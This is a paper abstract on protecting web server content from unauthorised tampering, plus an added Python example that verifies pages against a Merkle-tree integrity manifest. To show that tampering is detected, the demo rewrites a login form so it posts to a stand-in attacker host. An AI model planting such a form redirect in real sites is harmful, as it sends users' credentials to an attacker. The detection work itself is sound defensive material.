Security policy framework and algorithms for web server content protection

A significant web security issue facing Internet users and organizations is securing web content against unauthorised tampering. Users must be able to trust the security offered by web applications that provide sensitive web-based services. Some progress has been made on verifying the integrity of web server content, but current solutions are restricted by the limitations of the SSL protocol, the statelessness of HTTP, security mechanisms that operate blindly on ad hoc models, and the difficulty of automatic code analysis. We present a real-time web security framework, a stateful protocol for web policies, and a number of specific algorithms that can be used to verify and protect both static and dynamic web content against unauthorised tampering. We suggest that such a framework offers a higher level of user confidence and improved web service survivability.
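As an added illustration of the kind of content-integrity check the abstract refers to (this is not the paper's own framework or algorithm), the following Python builds a Merkle tree over the pages of a static site, publishes the root in a manifest, and lets a verifier check a single served page against that root using only the page's audit path. The sample site, the key name MANIFEST_KEY and the use of an HMAC over the root as a stand-in for a digital signature are all assumptions made for the example.

```python
"""Merkle-tree integrity manifest for static web content (added example)."""
import hashlib
import hmac

# Constructed sample site: path -> body as served from the document root.
SITE = {
    "/index.html": b"<html><body><h1>Welcome</h1></body></html>",
    "/about.html": b"<html><body>About us</body></html>",
    "/login.html": b"<html><body><form action='/login'>...</form></body></html>",
}

# Hypothetical manifest key. A real deployment would sign the root with an
# asymmetric key so the web server itself never holds the signing secret.
MANIFEST_KEY = b"example-manifest-key"


def _leaf(path: str, body: bytes) -> bytes:
    # Domain-separate leaves (0x00) from interior nodes (0x01) so an interior
    # node cannot be replayed as a leaf (second-preimage attack on the tree).
    return hashlib.sha256(b"\x00" + path.encode() + b"\x00" + body).digest()


def _node(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()


def _levels(leaves):
    """All tree levels, leaves first; a level with odd width duplicates its last node."""
    levels = [list(leaves)]
    while len(levels[-1]) > 1:
        cur = levels[-1]
        if len(cur) % 2:
            cur = cur + [cur[-1]]
        levels.append([_node(cur[i], cur[i + 1]) for i in range(0, len(cur), 2)])
    return levels


def build_manifest(site: dict, key: bytes) -> dict:
    """Publish the sorted path list, the Merkle root and a MAC over the root."""
    paths = sorted(site)
    levels = _levels(_leaf(p, site[p]) for p in paths)
    root = levels[-1][0]
    return {"paths": paths, "root": root,
            "tag": hmac.new(key, root, hashlib.sha256).digest()}


def proof_for(site: dict, path: str):
    """Audit path for one page: (sibling_hash, sibling_is_left) from leaf to root."""
    paths = sorted(site)
    levels = _levels(_leaf(p, site[p]) for p in paths)
    idx = paths.index(path)
    proof = []
    for level in levels[:-1]:
        if len(level) % 2:
            level = level + [level[-1]]   # same padding rule as _levels
        sib = idx ^ 1
        proof.append((level[sib], sib < idx))
        idx //= 2
    return proof


def verify_page(manifest: dict, key: bytes, path: str, body: bytes, proof) -> bool:
    """Check the MAC on the root, then recompute the root from this page and its proof."""
    expected_tag = hmac.new(key, manifest["root"], hashlib.sha256).digest()
    if not hmac.compare_digest(manifest["tag"], expected_tag):
        return False                      # manifest itself was altered
    h = _leaf(path, body)
    for sibling, sibling_is_left in proof:
        h = _node(sibling, h) if sibling_is_left else _node(h, sibling)
    return hmac.compare_digest(h, manifest["root"])


if __name__ == "__main__":
    manifest = build_manifest(SITE, MANIFEST_KEY)
    proof = proof_for(SITE, "/login.html")
    print("genuine:", verify_page(manifest, MANIFEST_KEY, "/login.html",
                                  SITE["/login.html"], proof))
    defaced = SITE["/login.html"].replace(b"action='/login'",
                                          b"action='http://attacker.example/login'")
    print("defaced:", verify_page(manifest, MANIFEST_KEY, "/login.html", defaced, proof))
```

The verifier needs only the manifest and O(log n) sibling hashes per page, so a browser-side or proxy-side check can validate each response as it arrives rather than re-hashing the whole site. Because the leaf binds the path to the body, swapping one genuine page's content onto another path is also detected.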
